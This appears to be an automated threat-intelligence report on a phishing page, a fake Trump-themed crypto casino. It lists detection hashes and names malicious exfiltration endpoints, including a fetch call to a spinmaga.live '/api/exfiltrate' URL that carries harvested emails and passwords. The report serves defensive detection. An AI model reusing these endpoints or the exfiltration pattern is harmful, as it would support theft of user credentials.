Detailed analysis of captured phishing page
Used to detect similar phishing pages based on HTML content
| Algorithm | Hash Value |
|---|---|
|
CONTENT
TLSH
|
T1E5E229B49230D335B1C247E8DA6425287A5FE1DDD7C695B4E388AF11B0D6CE8D9260CF |
|
CONTENT
ssdeep
|
384:4r/aJcuv/xRvRhiXkdvNTDhPhLxeAxeDWNW1Tp34PxeeJEmuW3AsUIRWUMd:4r/aJcuv/JhhPhleMeDGCSPxeeWmHLW |
Used to detect visually similar phishing pages based on screenshots
| Algorithm | Hash Value |
|---|---|
|
VISUAL
pHash
|
c73338cc783e694c |
|
VISUAL
aHash
|
006660307078b690 |
|
VISUAL
dHash
|
4ccccac3e5e46431 |
|
VISUAL
wHash
|
a0666630787ebf98 |
|
VISUAL
colorHash
|
38206000000 |
|
VISUAL
cropResistant
|
85858a88da9a78fa,100c323232320810,4ccccac3e5e46431 |
• Ameaça: Phishing
• Alvo: Usuários interessados em cripto e Donald Trump
• Método: Personificação através de um cassino falso
• Exfil: wss://gambler-work.com/api/ws (potencialmente credenciais e outros dados)
• Indicadores: Uso da imagem de Trump, oferece uma 'Recompensa Gratuita', formulário de registo
• Risco: ALTO
The site uses a registration form to collect user's email and password. This harvested data can be used to compromise accounts on other services.
Possibly to redirect users to malware downloads by compromising a user's account.
User fills <input name=email> → signalsFBEventsExtractFromInputs() → fetch('https://spinmaga.live/api/exfiltrate') → Data sent to external server
User fills <input name=email> → signalsFBEventsExtractFromInputs() → fetch('https://spinmaga.live/api/exfiltrate') → Data sent to external server
signalsFBEventsExtractFromInputs.jssignalsFBEventsExtractFromInputssignalsFBEventsExtractEventPayload644576191807769
Pages with identical visual appearance (based on perceptual hash)